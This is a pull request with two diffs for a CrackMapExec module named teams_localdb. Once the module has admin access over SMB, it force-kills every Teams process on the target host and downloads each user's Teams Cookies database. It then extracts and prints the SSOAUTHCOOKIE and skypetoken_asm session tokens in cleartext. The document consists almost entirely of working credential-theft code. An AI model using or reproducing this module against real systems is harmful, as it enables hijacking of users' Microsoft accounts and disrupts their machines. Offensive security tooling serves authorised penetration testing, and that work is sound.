### PR TITLE
Added functionality to retrieve ssoauthookie from Microsoft Teams local db

### DIFF
--- a/cme/modules/teams_localdb.py
+++ b/cme/modules/teams_localdb.py
@@ -3,42 +3,55 @@
 
 import urllib.parse
 import sqlite3
+from csv import reader
+from time import sleep
 
 class CMEModule:
 
     name = 'teams_localdb'
-    description = "Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database"
+    description = "Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process"
     supported_protocols = ['smb']
     opsec_safe = False
-    multiple_hosts = True
+    multiple_hosts = False
 
     def options(self, context, module_options):
         '''
         '''
 
     def on_admin_login(self, context, connection):
-        paths = connection.spider('C$', folder='Users', regex=['^Cookies$'])
-        for path in paths:
-            if "/AppData/Roaming/Microsoft/Teams" in path:
-                f = open("cookies.txt", "wb")
+        context.log.info('Killing all Teams process to open the cookie file')
+        connection.execute("taskkill /F /T /IM teams.exe")
+        #sleep(3)
+        found = 0
+        paths = connection.spider('C$', folder='Users', regex=['[a-zA-Z0-9]*'], depth=0)
+        with open("/tmp/teams_cookies2.txt","wb") as f:
+            for path in paths:
                 try:
-                    connection.conn.getFile('C$', path, f.write)
-                    self.parse_file(context)
+                    connection.conn.getFile('C$', path + "/AppData/Roaming/Microsoft/Teams/Cookies", f.write)
+                    context.log.highlight("Found Cookie file in path " + path)
+                    found = 1
+                    self.parse_file(context, 'skypetoken_asm')
+                    self.parse_file(context, 'SSOAUTHCOOKIE')
                 except Exception as e:
-                    context.log.error(str(e))
-                    context.log.error('Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database')
+                    if 'STATUS_SHARING_VIOLATION' in str(e):
+                        context.log.debug(str(e))
+                        context.log.highlight("Found Cookie file in path " + path)
+                        context.log.error('Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database')
+        if found == 0:
+            context.log.info('No cookie file found in Users folder')
 
     @staticmethod
-    def parse_file(context):
+    def parse_file(context, name):
         try:
-            conn = sqlite3.connect('cookies.txt')
+            conn = sqlite3.connect('/tmp/teams_cookies2.txt')
             c = conn.cursor()
-            c.execute("SELECT value FROM cookies WHERE name = 'authtoken'")
+            c.execute("SELECT value FROM cookies WHERE name = '" + name + "'")
             row = c.fetchone()
             if row == None:
-                context.log.error("No ssoauthcookie present in Microsoft Teams Cookies database")
+                context.log.error("No " + name + " present in Microsoft Teams Cookies database")
             else:
-                context.log.success("Succesfully extracted ssoauthcookie: " + urllib.parse.unquote(row[0]).split('=')[1].split('&')[0])
+                context.log.success("Succesfully extracted " + name + ": ")
+                context.log.success(row[0])
             conn.close()
         except Exception as e:
             context.log.error(str(e))

--- a/cme/modules/teams_localdb.py
+++ b/cme/modules/teams_localdb.py
@@ -1,0 +1,44 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import urllib.parse
+import sqlite3
+
+class CMEModule:
+
+    name = 'teams_localdb'
+    description = "Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database"
+    supported_protocols = ['smb']
+    opsec_safe = False
+    multiple_hosts = True
+
+    def options(self, context, module_options):
+        '''
+        '''
+
+    def on_admin_login(self, context, connection):
+        paths = connection.spider('C$', folder='Users', regex=['^Cookies$'])
+        for path in paths:
+            if "/AppData/Roaming/Microsoft/Teams" in path:
+                f = open("cookies.txt", "wb")
+                try:
+                    connection.conn.getFile('C$', path, f.write)
+                    self.parse_file(context)
+                except Exception as e:
+                    context.log.error(str(e))
+                    context.log.error('Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database')
+
+    @staticmethod
+    def parse_file(context):
+        try:
+            conn = sqlite3.connect('cookies.txt')
+            c = conn.cursor()
+            c.execute("SELECT value FROM cookies WHERE name = 'authtoken'")
+            row = c.fetchone()
+            if row == None:
+                context.log.error("No ssoauthcookie present in Microsoft Teams Cookies database")
+            else:
+                context.log.success("Succesfully extracted ssoauthcookie: " + urllib.parse.unquote(row[0]).split('=')[1].split('&')[0])
+            conn.close()
+        except Exception as e:
+            context.log.error(str(e))


### PR DESCRIPTION
This module makes it possible to extract the `ssoauthcookie` from the local Microsoft Teams database.

![image](https://user-images.githubusercontent.com/86128883/195070621-1f44973b-b6e6-42b6-9d4a-036e2ee63989.png)
